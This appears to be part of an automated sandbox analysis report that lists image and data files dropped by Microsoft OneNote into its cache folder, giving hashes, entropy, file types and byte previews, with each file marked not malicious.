SHA1:	25609AE097FB6A1421D75770B7FCE5F1FC21A5BE
SHA-256:	76F11ED704F42AE1763AD0017767830678287FA0AC8CFA97AE3A7E5361E7D340
SHA-512:	54FFCF387E0E26B5003EA2900AD2CD1B7BA6D4A31EAB2FC8D506B32EDFCEE2337F615AA5C080C52BBF7E60C7CCB3B12F1EC0808E706F071CA792420EAAD274E6
Malicious:	false
Preview:	2...>.......n...v...b...................................................................................................................................2...>...J.......v................................I.......I.qk..B.....LZd.......d.....u.>(...d..d.....u.>(...d..d....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............nZ.l...<..u........N...^...............T.....D.J...B.........f........................................I.qk..B.....LZ.............nZ.l...<..u.............nZ.l...<..u.............d.......d.......d...........................................d..j....d..T.]..d.......d....B..d..H....d....B..d....>.)d....J...................;........4...4...4.."..............d...d...d....z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4.........d.......d......#d..............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005N.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 60 x 336, 4-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	347
Entropy (8bit):	6.85024426015615
Encrypted:	false
SSDEEP:	6:6v/lhPtnlx/QulkWNY2V18A6Akp7eee1VDjMHCyLezyKUX5Gp:6v/7RrIubiA6AkpNhiyKe+
MD5:	78762C169F8B104CB57DFF5A1669D2DF
SHA1:	9638B71B584CD636834016A635ABF8D9C0887711
SHA-256:	E64FDCD0B108737D8B8F7B677029F924031D6BBAA50585D9C3DEF7C7E92ECAF2
SHA-512:	5ED899AAF73B72DEC32E171FFA112382667D5BF3FBA98C92E313E66C0A6975EA97068F4CD32B62283F18DBD5345C11E3610F7EEAC2F2DE71FC44593180B9CEAC
Malicious:	false
Preview:	.PNG........IHDR...<...P.............PLTE......................=l......bKGD....H....cmPPJCmp0712....Om......IDATh......@..aI...B..C..l...^.%.`....>.]..\|0.....a...hb...0......q.......p"....;...K..x=...p...y.yy~J....\|...\.......y..X.......'...>1...Ky..f....&........N`..f0..b...3.......`Z.3..3.....o.......4.&........SV...4.....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005O.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.35299879342195
Encrypted:	false
SSDEEP:	48:ksqcr3BWS+wjtsjxcE6qXSNf999CioWERrdQqr8KuRBXkP3C592XuD3CCstW:ksqCWS+wjCjmEFXSX99CinsRQy8JeIz
MD5:	EC63F3B2DC5F1BD90B3227150B8E8F7C
SHA1:	E40E844CAE36309A5EE117BE364CBC200A5F6D9D
SHA-256:	69574B2C35C02C93C35131D185E6A152D9FAD19835BB4A0A3BB8BFD18D7F2C87
SHA-512:	1F2EB8569B5CCDAA542CB0699EAB62E08FF47FEA46C4031F56D30AC0DE5300D01BBF1A89CCD95433CCC88DE7BA1B1B3EB64864D8475170CD2FDD20406342FFDF
Malicious:	false
Preview:	2...>.......R...v...F...................................................................................................................................2...>...........v...z............................I.......I.qk..B.....LZG!......G!.n.e.?G....r.G!.n.e.?G....r.G!...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............6@..gg....Y........N...^...............N."..+.E.+@y..10........f........................................I.qk..B.....LZ............6@..gg....Y............6@..gg....Y.............G!......G!......G!..........................................G!.j....G!.T.]..G!......G!..B..G!.H....G!...B..G!...>.)G!...J...................;........4...4...4.."..............G!..G!..G!...z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4.........G!......G!.....#G!.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005P.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 40 x 617, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	827
Entropy (8bit):	7.23139555596658
Encrypted:	false
SSDEEP:	12:6v/7Hs2NwBW1mtjeSfaTHHy05riYUtr8y8PQvPYzzg979Reip0QPqc:oOsotazy4rStr8y8PQIzWea0Qv
MD5:	3E675D61F588462FB452342B14BCF9C0
SHA1:	86B62019BC3C5BE48B654256B5D10293FC8C842A
SHA-256:	639EADAD468B6B32B9124B1F4395A8DA3027FF7258D102173BA070AE2ED541AE
SHA-512:	E6EA855B642ED36FA82F8E469A826DC57EB0C36E307045FF8D166F67AF9242C87840833BE31FBE4706DC54100E999D6A3D3A78D0633A3114735818874AD34758
Malicious:	false
Preview:	.PNG........IHDR...(...i..........`PLTE...................................................................................................bKGD....H....cmPPJCmp0712....H.s....qIDATx^...0.Cg.;......@j..2c.=~KP.[H~..@..8...?U.g.n.a=.=.).....3..u^(.....L....5..........8.}..T.f.n.a=.=.).....3..u^(.....L..r....s..8.....W]....,..9..G?.a..`c.z...E.p...)Y.P.....#....@9.7].....,..9..G?.a..`c.z...E.p...)Y.P...`b....0.b.+~{.Pu...1..<..0._.l.@O.y.(...V3%..J....s... .(g.+.qyWu...1..<..0._.l.@O.y.(...V3%...%R.L.Q..x..R.<t.o......7.............:/.E..j.da@i..`b..Z......u.>.?...7.............:/.E..j.da@.Dj..9.W....s. .....:.......L...">w..7... .....:..."...L..."..a....D..Ya.l....E.{.@&.\|.._...7..D..Ya.l.....{.@&.\|....0.J.."z.0s..s....=g ..>........"z.0s..s....=g ..>..l..1...y..g......IEND.B`.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005Q.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.325623477799434
Encrypted:	false
SSDEEP:	96:esOBlTl7I/6EXnPX39CEcRQysoFlTixT6FCJ:esOBlTl7IPXnPX39CEcRJHFlTixT6FC
MD5:	71958033A5AC3D5E6F597F064AA3FEA0
SHA1:	CC04E9F2DD312EAE6F19F44D9E2BC58FE8CC1BDC
SHA-256:	C5E2E47E49C2BB746D7049EC3848165BCD929725F752C3EAFC7312EDB2374886
SHA-512:	3E27EDCE21B7E0BE5CC47C45A8CB963568365C0883239FD5DDEA17BD7E2D1D737D9676F4C3FA460FD580CFCB61F1D0FD568BAB08A51161CD4E9C7D4E4585050A
Malicious:	false
Preview:	2...>.......N...v...B...................................................................................................................................2...>...*.......v...v............................I.......I.qk..B.....LZN.`.....N.`...,......9)LN.`...,......9)LN.`..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............K.5.... .a.Ol......N...^..................<...I.L].0.\|z........f........................................I.qk..B.....LZ.............K.5.... .a.Ol...........K.5.... .a.Ol...........N.`.....N.`.....N.`.........................................N.`j....N.`T.]..N.`.....N.`..B..N.`H....N.`..B..N.`..>.)N.`..J...................;........4...4...4.."..............N.`.N.`.N.`..z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4.........N.`.....N.`....#N.`............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005R.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 50 x 600, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	4410
Entropy (8bit):	7.857636973514526
Encrypted:	false
SSDEEP:	96:E/pQuIhKZ7u06dICH3AroiTe8DGTl55poBUmLNjpH7MvDHjfm:MpdZtPbknnRPpkLNVMvu
MD5:	2494381A1ACDC83843B912CFCDE5643B
SHA1:	98F9D1CC140076D1AE5A9EA19F47658FD5DF0D66
SHA-256:	5EEBE803E434A845D19BC600DF3C75E98BB69BD0DE473CEEC410D1B3A9154E28
SHA-512:	0E64CC3723DC41D94910F7ADFB6A0DFB5049350FD15A873695614E4A89ABD78B166BA4E9C8CB95E275FB56981539DECD2A7F28FBC25E80DD5E2DEA8077CC9489
Malicious:	false
Preview:	.PNG........IHDR...2...X.......E.....PLTE...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................B..(....bKGD....H....cmPPJCmp0712....H.s.....IDATx^.].\TU.?3"...(..L........q.Q...H.*j......W..Xd.ie.f..%.XT...em..m.m.vkik...>.}..}\|..{'.U..~......}....s.............,CVu.x.:C..5...;.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005S.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.336245046942891
Encrypted:	false
SSDEEP:	48:YuNEBsxuKMKZtLCwEZUncf0L2XN9G+olrdQqrBYZBX4tbxZ:YHBs/MKZVnEZnf0CXN9G+ERQyOZM
MD5:	56993A6C0E347CE861FD81CF1B7B04AC
SHA1:	6D03A1BF0EE65D24C955D7D33B00F98BD759EC45
SHA-256:	0BCCB7B781A408A788743162C2F840DF2A8BA93496B5BAAA896486FA25D519CC
SHA-512:	E354F7DB1F54E7E5403B70BE6FBB96DD6AD3AF41738289AB3AC7243A90A61CD1AA2E29835E9819571D7DA76FDD8F8CE01E3F7E95F7F840710F2E022854D7240C
Malicious:	false
Preview:	2...>.......P...v...D...................................................?....?..........................................................................2...>...,.......v...x............................I.......I.qk..B.....LZK"......K"......u.?..K"......u.?..K"...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............} .E..>.....GEs.....N...^...............NM-..lIO....=...........f........................................I.qk..B.....LZ............} .E..>.....GEs.........} .E..>.....GEs..........K"......K"......K"..........................................K".j....K".T.]..K"......K"...B..K".H....K"...B..K"...>.)K"...J...................;........4...4...4.."..............K"..K"..K"...z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4.........K"......K".....#K".............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005T.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	136726
Entropy (8bit):	7.973487854173386
Encrypted:	false
SSDEEP:	3072:SIXmy5Tl704vW2ZKkvV8UU0ZWUF0BJwySIdgz816YzDc1+opecYPn:Sny5Tl704fZFV8UU6LGXwyS4xohpQPn
MD5:	4A2472AC2A9434E35701362D1C56EDDF
SHA1:	16FA2EA2D2808D75445896E03B67A93000EEDDD8
SHA-256:	505F731CB7707EFAB2EB06685B392DC7E59265A40B55AAE43E5DC15C0A86CBA4
SHA-512:	5E28D8FB2AC62ED270968072A30013334461F7CAE96058AF9EAA6E10912989DC47112D2133892BF61F7A516B77C6FF71BA2A000B750A9F95C787E538B09595C2
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!1..AQaq".....2B....R#..b3...r...C$...X.....Sc...9.%'.(Hs4Dgw..T..5GW.x.)......................!.1..AQa"2.q.......B..#c........b6.Rr.3s$.&..S...C4.%5............?.........(......(......(......(......(......(......(......(.G/.GE&...)..P.x..B.({i2Y;.z?G...Yfc.)H..^....#.....}3..Sc^.H..+...M.a.P.....GS.....H_.3..<....1f........1.<.\..nn-..s.s.\9Y....=.......S.0.......N..cA..Io..r.3..........ay.....K.....,.;9..Q......xO.Fa.2..>........{4k.....\|....?U....3.8..._/3....#.. t.y......yY.......e.<........#.....B.....Z.%.Y..S.ye.W4...l.......X...%.@y}>....l.yi..D..W......L..._D.Q....)...E....n.%...*..K.4#.8`..I....h..h.o..I......-...hB...3..u.(5..........n...,.@....a.t.9.....@.s.>.&...@

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005U.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.352231156163611
Encrypted:	false
SSDEEP:	48:/JAsFvALT5QMTXi/t+dmwEKHL7NLXPXL9eqo9rdQqrmlKBXgBftdl:/JAs1M7i/Y9EKHVLXfL9eqERQyfWd
MD5:	EA7E2ECC90FE5431B71812DD522778E1
SHA1:	75ED9845EB0DF92B436EDF82587333386C800196
SHA-256:	F6DE48E89DCAC6C347AD5ACF5658E9A07BCD3ACF1E6AF5093E2FB824A02F3EEF
SHA-512:	31CA195598ED3EFD16387A33FDC6752F9ADA6595C8766949689AFB74F99AEF2202D9A654A93BE2FDE056568DE0E0E1F30071A2B17803B8C37E24E1F94ADF4B36
Malicious:	false
Preview:	2...>.......N...v...B...................................................................................................................................2...>..........v...v............................I.......I.qk..B.....LZ6.!.....6.!dXc5..o.yt...6.!dXc5..o.yt...6.!..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............t.Y....t.7.......N...^....................G..m............f........................................I.qk..B.....LZ..............t.Y....t.7.............t.Y....t.7............6.!.....6.!.....6.!.........................................6.!j....6.!T.]..6.!.....6.!..B..6.!H....6.!..B..6.!..>.)6.!..J...................;........4...4...4.."..............6.!.6.!.6.!..z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4.........6.!.....6.!....#6.!............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005V.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 77 x 627, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	5136
Entropy (8bit):	7.622045262603241
Encrypted:	false
SSDEEP:	96:djzuNKb3XHco17p2wolIxIx7lpskdsC/ddWNKeabJbMojpxLDTu1:VzuNKb397pwlIxKp7qs3bJb5FBTw
MD5:	FA38AFA965141EA3F17863EE8DCCDE61
SHA1:	2B4611E651AF7549C1AA73932B1136B561A7602F
SHA-256:	E1CB1A0EC9BE62D5445C73AA84DF38234002A7E164EE830C9DF24997802CB5D2
SHA-512:	A372674F5CA343321BA9C413D346070709F7685706C9C6C3DC7F61846B59253A5E6FE800DBA10AE870FD3887439B2AA106FBBB51751E92A163938A4393C43E28
Malicious:	false
Preview:	.PNG........IHDR...M...s.....}8nv....PLTE.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................z`.....tRNS...................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000060.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.44151192461428
Encrypted:	false
SSDEEP:	96:WgjsIv7ypiaaZErX+R9qqcRQy7hJ70uMK8:dsFia/rXE9qqcRJ7h
MD5:	F508D6CAC6796E70E1CD8EA415F0F733
SHA1:	96AA6FD43BA684B5CE9D6CC9FC67CA6506DD9EA0
SHA-256:	314995BFEEBCA9EC64CF2ABDFE729F87A4231EF0BB01C62B2C362AEC8A9CF821
SHA-512:	81B3EB48CC48649F010026694FE5D9ACC8342D55E102409C2DF2D89E65026CEF45818492A4A7D1051E4503F448AB1C65F7247DFB3F667A135C59B1DE47B2B1F1
Malicious:	false
Preview:	2...>.......h...v...\...................................................................................................................................2...>...D.......v................................I.......I.qk..B.....LZ.=.......=.......,K.U..=.......,K.U..=...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............Q!....2..`.......N...^..................m...C.#.[..+_........f........................................I.qk..B.....LZ............Q!....2..`...........Q!....2..`.............=.......=.......=...........................................=.j.....=.T.]...=.......=...B...=.H.....=...B...=...>.).=...J...................;........4...4...4.."...............=...=...=...z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4..........=.......=.....#.=.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000061.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	52945
Entropy (8bit):	7.6490972666456765
Encrypted:	false
SSDEEP:	768:cjvqR0XvFaGCTJffi0tgybmWDoTw71kHUAnjvawrlp2+NUO8dWSNl3PF2PjK/q09:cyRffflgybmWoTw1UUADHUbU21MjpAD
MD5:	AD003F032F32FAC4672D4CE237FA5C5B
SHA1:	AE234931B452F0D649D91291763B919CF350EA49
SHA-256:	ADB1EBBE18D6CD8FF08AA9BF5C83CDB83BF9AA179698E34E93DBCDDE12F04D32
SHA-512:	ECA25FA657ECE3A66D3E650628E0F65D3BADD38864C028AB6553950A1A66D7D55482C85E9E565573E9E5AAFA91C2D53235971C644A266D41EB69F8E72E3A843B
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!1..AQ..aq....".....2....BR#r.b3$...C.Sc%...s5E......................!1.A..Q.aq"...2...#...B...Rb3..$..CSr...6............?......y_N.e.H7?........W..w....k\|...S..d.4.>.RW5z.$.i.)V.O....>o...c..&1.D..O..".ufbb..1...t..u=..K...m...~.....F..-.fb:i..=f..C.w.[{..~.7k....;..:..3....4.....$..m]...}....~q...9T.#..7.~..8...q.N;c..ffo.w...W..d........../t_........lWJE..).>..v;:=....Rrw#.m.n.n...E...vm.J}2N..\|.4...80.#..e....t.J..ZQ.x\|g/....F..e....k+vK...M..W.X.e.L..~...j.....kz....=...n:O.:..[.L,.+R...Y..zKNI....,..{e..U.'...}.......\|..t.]...~...b4......_.i..../.......m...a..n...v.j.?..Rc.$G\|.31..#..$?.........h.w....-... .a.%z..u......u.A....Fm..J.......G..[...w.....:....w/.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000062.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.458910926638198
Encrypted:	false
SSDEEP:	48:zWbmsR+kXMzlLYItqLLLCEbL2XXoXVdb9uYd63QErdqrb0hVBX+akhkZ2Lkhv5kn:JsKlLYIoPeEb5XVl9uYd6FRyKLtI
MD5:	835131EB6B8F189FDE2A683589E85A7E
SHA1:	A5227A1750AB4A6649E854A3990A39D4D712A907
SHA-256:	A9E7D32D0B2305F495671395079451ABF40FFA901A9BE5A2DDC80CA33D4FC114
SHA-512:	AE7F8D4A33FAA4E94A4A8553D4FFB9224CDCE0ED403DF3545D9C8F3175F8A7265067DBFD3151EA431E04E05D3E8E83C542D40B396817C1A8C3FB8136B083C5A6
Malicious:	false
Preview:	2...>.......h...v...\...................................................................................................................................2...>...D.......v................................I.......I.qk..B.....LZOx......Ox..q.#..F..1.Ox..q.#..F..1.Ox...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............n.......r{5.,b.....N...^................`...;L.....pC.........f........................................I.qk..B.....LZ.............n.......r{5.,b..........n.......r{5.,b..........Ox......Ox......Ox..........................................Ox.j....Ox.T.]..Ox......Ox..B..Ox.H....Ox...B..Ox...>.)Ox...J...................;........4...4...4.."..............Ox..Ox..Ox...z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4.........Ox......Ox.....#Ox.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000063.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	79656
Entropy (8bit):	7.966459570826366
Encrypted:	false
SSDEEP:	1536:2kuUliOeU4os8ii3nF3Hxro/qxXD9u/kjYgMZqoEs6ZUldm:3uUsOXYIAixR2k7WAZV
MD5:	39FF3ACAE544EAC172B1269F825B9E9F
SHA1:	2D40DE8D90BD21D56314D3F99CEF4FBAE3712C0F
SHA-256:	70475431CCA3C91A4EFA3B8F04864371D2D3A45696674A1A0562FE9CD8DB287C
SHA-512:	3B9F3B32696AB7779864E83DC0C45960114A130BEE0CF4D0643DE57FF952171E5D775AA49141EE31A28A9B5D052B26EB421F26EA736D7EF4B3A7EC812CA411CB
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!.1A.Qa"..q.....2#..BRb..r3$.Cc..Ss.4...D%5&..T...'7....................!1.A..Q.aq..."2.....B3.r.#..R...bc$4..D.s%............?..Y..T.o.\......=.a..j..'^..s..[../........Y.......<...(..4.....7y..Ln.[9.cK.ilN...u@$.V.9.V?3..s.KL.z..w.jW.C.............@.~+.o?o8...k....,.m..9.".....q.....d....z.W...q...~...'..e..>..f#...S.....F....pU.......7..N.vfK......S..G.#.....}.c.........RXt.bq1.`.....[+8\..N..:......}.....r..........')......Na...&...m......c...a4_%d.............co..0.n.L.Q..E.Lt..y.\|..F..4.i(>.._..\.eNL8..?z9I:hLgC.@.p....g.t......'.I!d..?1f..R..........\|..4.wJ..%g..~0bt.....*...v.......O...:.~.>~..o.x...9.@>...s.&.E.0/G.c..t.<..F.t.A.z. ......;.........Gp.P

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000064.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.451503687271817
Encrypted:	false
SSDEEP:	48:pSsng/09mzhalP+tuoEWnRqlRXE/N9DVo7Brdqr2JfBRXr0Dh37Jn:pSsnVmlaP+VEvXQN9DV0Ry2tBdY7
MD5:	B4885C470E020EC947C281114CB73940
SHA1:	C4816EBA1A1618170782593CFEC3A39D136C50B1
SHA-256:	E5AC3E93E0278B8DD65EB52B6D411A2B2F9F8677DC5E4E8EEB31C9744C2FBF6A
SHA-512:	7DE0772D537B931FD9A24D8673F415FBAC6643EFF6DC6897CB87C91656613554CD5177EE55E21B41ACF98F4451711B1F32E91E718FEF4EFA409BAEBA4583A487
Malicious:	false
Preview:	2...>.......p...v...d.....................................................?....?........................................................................2...>...L.......v................................I.......I.qk..B.....LZJ"F.....J"F.....%cM..#.J"F.....%cM..#.J"F..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............2y/..d.. m.KPZ6....N...^................&.=8..F.k...,..........f................................... ....I.qk..B.....LZ............2y/..d.. m.KPZ6........2y/..d.. m.KPZ6.........J"F.....J"F.....J"F.........................................J"Fj....J"FT.]..J"F.....J"F..B..J"FH....J"F..B..J"F..>.)J"F..J...................;........4...4...4.."..............J"F.J"F.J"F..z...y.. x.. ...........$........4.....7..7........................;........4...4...4.........J"F.....J"F....#J"F............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000065.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	40884
Entropy (8bit):	7.545929039957292
Encrypted:	false
SSDEEP:	768:MCBOA4d+ElOXJ/3pI7cRBiL7L6qERqGz65WXzZqJsKQSbIsTT6XB:hIAU+2cGdLX6qBG4WDZl4Ihx
MD5:	7379775A1E2AB7FAB95CFFCE01AE05F3
SHA1:	3D3DDFD8AC7E07203561BAE423D66F0806833AB3
SHA-256:	9301DB6D2D87282FCEE450189AEACE16D85F64273BF62713A3044992B6B7A9E9
SHA-512:	4B5006E620E80D3A146944649CF4CA619782CAD7E8C4CD0D1DE0EBCA0FA05EACB7378DAFCEED3E26F5698B07F19604614D906C8F51F898660E2F129D8DEC6F62
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!.1A.....Qaq....".....2....BR#S..br...3T...C$.7(Hx....4D.G..Xh.cs..'..t...%...8.....................1...!AQ..a...q"2.4Tt.......R3S....Br...#s...Uu.bc.de..$D..6..C%E..............?...z...;sB.yv...........]t.\...n...../....m....M.=.3G+..x+.....S).*&.J../..8..O/+..sG...p...<!....~.c..C.w..,[oHom.wc-.J.~.......L[..6...'..i_..S;...!Y.z.q].EK..M.x...i.x.+.;.+...}....#......f.)........e6V..p.;........s.)..Ml.J......IU.6...<9+9.^..l..Y...[._...2..^..j.ia...._..3.;...~..<3...;......z.^.......]..Qk.,...Yk...3.3Jy^p.}....q...I...&..t.......;..9.g.GH;..'...%...)..[..y..../...zCn..>...'...1e.Y..;....]..7...N>t..m-.j.............H^..T\.q.ru...}...eTn]I'r.^].#..wOY....v

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000066.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.315489763193309
Encrypted:	false
SSDEEP:	96:YVsOrTWjuEz+LXuuO9jomBRyE70VQxieG4v8:WsOrTY7qLXuuO9joMRyE70VStGq8
MD5:	AEE55F2FF68945A4111BECB9A6CA8217
SHA1:	D713F028177A6548C6496BD706CAC346DD38E76F
SHA-256:	B7270592407C7362800EDAF9F215D760D951BE8AAABD75CD4B28AF678132B5D7
SHA-512:	D4C75EDFAC71FF4822585570449B94CB414717D341C95468FF3881551980BEDBC851C5CBF9F6244CB1591679F96E1A2BC494D323EA49A0ABEB62E5C00778DCF4
Malicious:	false
Preview:	2...>.......P...v...D...................................................?....?..........................................................................2...>...,.......v...x............................I.......I.qk..B.....LZA^......A^.\|..,.1.M.&}@5A^.\|..,.1.M.&}@5A^...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............../o0......T.;......N...^...............a.:j.j#A.zb.b.:.........f........................................I.qk..B.....LZ............../o0......T.;............/o0......T.;...........A^......A^......A^..........................................A^.j....A^.T.]..A^......A^...B..A^.H....A^...B..A^...>.)A^...J...................;........4...4...4.."..............A^..A^..A^...z...y.. x.. ...........$........4.....7..7........................;........4...4...4.........A^......A^.....#A^.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000067.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:05:55], progressive, precision 8, 612x618, components 3
Category:	dropped
Size (bytes):	68633
Entropy (8bit):	7.709776384921022
Encrypted:	false
SSDEEP:	1536:tapXpSTJDOkFGdJdBk/slsbfsw1imaapnbvD8:U2OjJr6b07m1bvD8
MD5:	41241EE59AB7BC9EB34784E3BCE31CB4
SHA1:	98680761A51E9199CF3C89F68B5309FBEC7EE3CB
SHA-256:	035B26DF61855A3F36DBD30FDAB0C157C04C9E8AE2197EA4D4AEB3E82E6A4C2B
SHA-512:	3EE331D5BCEE4AD5D3FC9661D4AB4053F7D351591A094334F963C33C9D0E32CCCABE9334AD7C308108CE99617E064FE848DCD469ACD8D83FBE5C4452DE523D8F
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:05:55.............................d...........j...........................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?../$.W:SZ./...9.....-...u......r.....].c...@W_.7...+......v.+PD.I..-<1.pDn-\.....p.$....0.}V....\..>.~..XN.o..l(E....ik..o.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000068.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.472806210394127
Encrypted:	false
SSDEEP:	96:5uFfscF18kWXdhZkEg3MbmXdXk9PmQRyaD+NEh8koXegOj6MNsdO:5qsDldhzg3MbmXdXk9PmQRyOnK
MD5:	3A9FA02B99587C68FABADDD468D200CB
SHA1:	A469D63BD148AA768D52033FD5D2CE4586747277
SHA-256:	F4722E4283F87ED1D26B01C174985E9CCC207C8B44570F3E088CF7D438FE77EF
SHA-512:	676BB4FF5917A3E960A215E0B65CD00C12EFBAF34BA88EDE542AA505199550C1F2F362DF2017466AEA7E8BC8A0809422D949AECDBC6737501800B4057CF615E7
Malicious:	false
Preview:	2...>.......t...v...h...................................................................................................................................2...>...P.......v................................I.......I.qk..B.....LZ..............M...P\.w5.......M...P\.w5......I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............n+.H../...W.6....N...^................ ..1.fO..M.#r..........f...................................$....I.qk..B.....LZ..............n+.H../...W.6..........n+.H../...W.6........................................................................j.......T.]...............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4.....7..7........................;........4...4...4........................#...............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000069.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 176 x 513, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	11043
Entropy (8bit):	7.96811228801767
Encrypted:	false
